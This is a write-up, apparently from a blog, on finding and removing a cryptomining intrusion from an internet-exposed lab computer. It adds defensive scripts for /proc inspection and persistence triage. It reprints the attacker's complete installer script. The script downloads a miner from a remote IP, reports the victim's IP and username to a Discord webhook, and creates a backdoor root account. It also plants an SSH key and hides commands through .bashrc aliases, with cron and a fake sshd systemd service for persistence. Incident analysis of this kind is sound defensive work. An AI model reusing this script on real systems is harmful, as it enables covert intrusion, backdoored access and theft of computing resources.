Notes on a cryptomining intrusion and its cleanup
To make remote use convenient, a junior labmate mapped the lab computer onto the public internet. The result: a mining program was planted on it.
The mining software is this one (screenshot). Because it has already been cleaned off, it can no longer be seen running; otherwise the nvidia-smi command would show this mining program at work.
Then go into that process's directory, cd /proc/$PID, and inspect its information.
First list all the files; you can see where the mining program was placed.
cat status shows the process information.
Here PPID identifies the parent process. I am reproducing the incident, so the parent process is 4168; originally the parent process was 2.
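The /proc inspection the post does by hand (cd /proc/$PID, cat status, look at the files) as a reusable function. This is an added example, not code from the original post: given a pid it prints the name, PPID, the real path of the executable and working directory, the command line, and then walks up the parent chain so a miner respawned by cron or a systemd unit shows where it came from.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: summarise a process from /proc
# the way the post does by hand. Assumes a Linux procfs at /proc.

# PPID of a process, read from /proc/<pid>/status (empty if the pid is gone).
proc_ppid() {
  awk '/^PPid:/ {print $2}' "/proc/$1/status" 2>/dev/null
}

# Name of a process, from the same file.
proc_name() {
  awk '/^Name:/ {print $2}' "/proc/$1/status" 2>/dev/null
}

# Full summary; returns 1 if the pid does not exist.
proc_summary() {
  pid=$1
  [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
  printf 'pid=%s name=%s ppid=%s\n' "$pid" "$(proc_name "$pid")" "$(proc_ppid "$pid")"
  # exe and cwd are symlinks; readlink resolves them to the real path, which is
  # how a binary living under /var/tmp/.tmp/ stands out even if it was deleted
  # after launch ("(deleted)" is appended in that case).
  printf 'exe=%s\n' "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
  printf 'cwd=%s\n' "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
  # cmdline is NUL-separated; turn the separators into spaces
  printf 'cmdline=%s\n' "$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)"
  # parent chain up to pid 1 / kthreadd
  p=$(proc_ppid "$pid")
  while [ -n "$p" ] && [ "$p" != "0" ]; do
    printf '  parent pid=%s name=%s\n' "$p" "$(proc_name "$p")"
    p=$(proc_ppid "$p")
  done
  return 0
}

# usage: proc_summary <pid>, e.g. the pid that nvidia-smi shows for the miner
if [ -n "${1:-}" ]; then
  proc_summary "$1"
fi
```

Run it as a script with the pid as argument, or source it and call proc_summary on several pids. The parent chain is the useful part for this incident: a miner whose parent is cron, or a service started by systemd, tells you which persistence mechanism to look for next.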
Then I killed the parent process and the mining process. A while later the miner reappeared, so presumably there was a scheduled task; rebooting did not help either.
First check whether the boot start-up script is normal:
vim /etc/rc.local
This file was normal, so that is not where it was put.
Then check the root account's .bashrc file:
vim ~/.bashrc
It only had these few lines, which clearly disable the delete command. After switching to the root account I found that many commands were masked, so something was definitely wrong, but this file does not itself run the mining program. Considering scheduled tasks, check whether a crontab has been set:
ps -aux | grep crontab
Sure enough, there were scheduled tasks. Look at them with:
crontab -e
You can see these odd entries; here I have commented them out.
Then look at the files under /var/tmp/.tmp/.
The first file:

```bash
#!/bin/bash
m1lbe1() {
if ! pgrep -x PhoenixMiner >/dev/null
then
cd /var/tmp/.tmp/PhoenixMiner
./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
exit;
fi
}
m1lbe1
```

The second, much larger file:

```bash
#!/bin/bash
###Date###
user="sclipicibosu"
pass="saieilamuie"
gilimea='"'
ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
rm -rf *timeout
sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
nenea=`whoami`
uptime=$(</proc/uptime)
uptime=${uptime%%.*}
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
sended=$(date +'%m/%d/%Y')
url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
##########
getingmineru(){
locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
if [ -f $locatie/PhoenixMiner ]; then
:
else
curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
tar xvf PhoenixMiner.tar
chmod 777 PhoenixMiner/*
fi
}
###
locationperfection(){
tinlex=$(pwd)
mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
if [ $(id -u) = 0 ]; then
if [ -f "/usr/bin/.locationesclipiciu" ]; then
:
else
echo $tinlex > "/usr/bin/.locationesclipiciu"
fi
fi
}
###
showproof(){
echo ' { "content": null, "embeds": [ { "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ", "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**", "color": 16711680 } ] }' > /tmp/.send.json
/usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
}
###
sshkiller(){
if [ $(id -u) = 0 ]; then
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
' > ~/.bashrc
" > /usr/.SQL-Unix/.SQL/.db
echo "# .bashrc
source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
" > ~/.bash_profile
chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
echo $sshkey > "/root/.ssh/authorized_keys"
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
else
mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
' > ~/.bashrc
" > /var/tmp/.SQL-Unix/.SQL/.db
echo "# .bashrc
source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
" > ~/.bash_profile
fi
}
###
facuser(){
if [ $(id -u) = 0 ]; then
if ! cat /etc/passwd | grep -q "${user}"; then
/usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
yes "$pass" | passwd $user
else
:
fi
fi
}
###
minerinio(){
locatie="$(pwd)"
if [ -f $locatie/.b4nd1d0 ]
then
locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1() {
if ! pgrep -x PhoenixMiner >/dev/null
then
cd '$locatie'/PhoenixMiner
./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
chmod 777 $locatie/.b4nd1d0
$locatie/./.b4nd1d0
else
locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1() {
if ! pgrep -x PhoenixMiner >/dev/null
then
cd '$locatie'/PhoenixMiner
./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
chmod 777 $locatie/.b4nd1d0
$locatie/./.b4nd1d0
fi
}
###
crontablegend() {
locatie="$(pwd)"
if ! crontab -l | grep -q '.placi'; then
rm -rf $locatie/.5p4rk3l5
echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
sleep 1
echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
sleep 1
echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
sleep 1
echo "@monthly "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
sleep 1
crontab $locatie/.5p4rk3l5
sleep 1
source ~/.bashrc
rm -rf $locatie/.5p4rk3l5
fi
}
###
locationperfection
sleep 0.5
echo "Locatie ON"
wait
getingmineru
sleep 0.5
echo "Minerul Luat"
wait
facuser
sleep 0.5
echo "User Facut"
wait
sshkiller
sleep 0.5
echo "SSH Mort"
wait
showproof
sleep 0.5
echo "Info Trimis"
wait
crontablegend
sleep 0.5
echo "Crontab Done"
wait
minerinio
sleep 0.5
echo "Minerul Pornit"
wait
###
checkingpid(){
if [ -f /usr/bin/.pidsclip ]; then
if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
echo "Already running..."
else
/usr/bin/sshd > /dev/null 2>&1 & disown
echo $! > /usr/bin/.pidsclip
chmod 777 /usr/bin/.pidsclip
echo "Done"
fi
else
/usr/bin/sshd > /dev/null 2>&1 & disown
echo $! > /usr/bin/.pidsclip
chmod 777 /usr/bin/.pidsclip
echo "Done"
fi
}
###
killingstrangers(){
echo '
#!/bin/bash
locatieasdf=$(cat /usr/bin/.locationesclipiciu)
if [ ! -d '$locatieasdf' ]; then
mkdir '$locatieasdf'
rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
sleep 1
'$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
else
if [ ! -f '$locatieasdf'/PhoenixMiner ]; then
rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
sleep 1
'$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
fi' > /usr/bin/sshd
sleep 1
chmod 777 /usr/bin/sshd
}
###
pisamsystemu(){
echo '[Unit]
Description=Example systemd service.

[Service]
Type=simple
Restart=always
RestartSec=3600
ExecStart=/bin/bash /usr/bin/sshd

[Install]
WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
sleep 1
chmod 644 /lib/systemd/system/myservice.service
systemctl enable myservice
systemctl start myservice
if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
echo "Locatia este deja setata"
else
if [ -f "/usr/bin/.locationesclipiciu" ]; then
locationperfection
echo "Am-rupt-locatiile-alea"
sleep 1
fi
fi
if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
if [ -d "/var/tmp/.ladyg0g0" ]; then
locationperfection
locationperfection
echo "Locatia a fost setata"
else
echo "Acum facem folderul"
mkdir /var/tmp/.ladyg0g0/
locationperfection
locationperfection
echo "Am setat locatia"
fi
fi
if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
echo "Already running..."
else
$(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
echo "Done"
fi
else
$(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
echo "Done"
fi
}
###
if [ $(id -u) = 0 ]; then
if [ ! -d /usr/bin/.locationesclipiciu ]; then
cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
if [ ! -f /usr/bin/sshd ]; then
killingstrangers
pisamsystemu
checkingpid
fi
fi
fi
###
```
You can see that this person really did do their work here: the script rewrites the .bashrc file, which is why our earlier look at it did not directly reveal the problem. Actually, if they had backed up .bashrc first, run the malware, and then restored it, it would have been far more covert. Probably a novice (although it took me a long time to find this malware too...).
With that, the mining malware was cleaned out, and I was scared enough to immediately shut off the port mapping. Some people really will do anything for money...
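The .bashrc and crontab checks earlier in the post, and the persistence the installer script above sets up, can be triaged with a few file-level checks. The following is an added example, not code from the original post or from the attacker's script: each check takes a file path so it can run against the live host or against copied evidence. The checks cover command-masking aliases and a sourced hidden file in ~/.bashrc, a second UID-0 account in /etc/passwd, cron entries under dot-directories in /var/tmp, a systemd unit whose ExecStart runs an interpreter on a file named like a daemon, and an immutable authorized_keys. The paths in triage_live are assumptions about a typical Linux host, and the sample inputs in the usage are constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original post or the attacker's script: triage
# checks for the persistence mechanisms the analysed installer leaves behind.

# Aliases that redirect a command to printf "" (a no-op), e.g. alias kill='printf ""'.
# Prints the masked command names, one per line.
masked_aliases() {
  grep -Eo "alias [A-Za-z0-9_]+='printf [^']*'" "$1" 2>/dev/null \
    | sed -E "s/^alias ([A-Za-z0-9_]+)=.*/\1/"
}

# Files pulled in by `source X` or `. X`; the installer hid its aliases in one of these.
sourced_files() {
  grep -Eo "^[[:space:]]*(source|\.) +[^[:space:]]+" "$1" 2>/dev/null | awk '{print $2}'
}

# Accounts with UID 0 other than root (the installer adds one with useradd -u0 -g0 -o).
uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" {print $1}' "$1" 2>/dev/null
}

# Crontab lines (saved output of `crontab -l`) that run something from a hidden
# directory under a world-writable temp location.
hidden_tmp_cron() {
  grep -E '(/var/tmp|/tmp|/dev/shm)/\.[^/[:space:]]+' "$1" 2>/dev/null
}

# systemd units that start an interpreter on a path, e.g. ExecStart=/bin/bash /usr/bin/sshd.
# A real sshd unit runs the binary directly, so this line pattern is worth a look.
interpreter_exec() {
  grep -E '^ExecStart=.*/(ba)?sh[[:space:]]+/' "$1" 2>/dev/null
}

# True if the file carries the immutable attribute (chattr +i), which blocks even root
# from editing it until chattr -i is run. Needs lsattr; lowercase 'i' is the immutable flag.
is_immutable() {
  lsattr "$1" 2>/dev/null | awk '{print $1}' | grep -q i
}

# Run every check against the live host (assumed standard paths).
triage_live() {
  echo "## masked aliases in shell start-up files"
  for f in ~/.bashrc ~/.bash_profile; do masked_aliases "$f"; done
  echo "## files sourced from ~/.bashrc"
  sourced_files ~/.bashrc
  echo "## extra UID-0 accounts"
  uid0_accounts /etc/passwd
  echo "## cron entries under hidden temp directories"
  tmpcron=$(mktemp)
  crontab -l > "$tmpcron" 2>/dev/null
  hidden_tmp_cron "$tmpcron"
  rm -f "$tmpcron"
  echo "## systemd units starting an interpreter"
  for u in /lib/systemd/system/*.service /etc/systemd/system/*.service; do
    [ -f "$u" ] && interpreter_exec "$u" | sed "s|^|$u: |"
  done
  echo "## immutable authorized_keys"
  for k in /root/.ssh/authorized_keys ~/.ssh/authorized_keys; do
    [ -f "$k" ] && is_immutable "$k" && echo "$k"
  done
  return 0
}

# usage: source this file and run triage_live, or point the checks at copied evidence,
# e.g. masked_aliases /mnt/evidence/root/.bashrc
```

Two things to keep in mind when using it. The alias masking only affects interactive shells, so run the checks from a script or with `bash --norc` rather than from the compromised root login, where ps, find and crontab are themselves aliased away. And an immutable authorized_keys has to be cleared with chattr -i before the attacker's key can be removed; deleting the file fails silently otherwise.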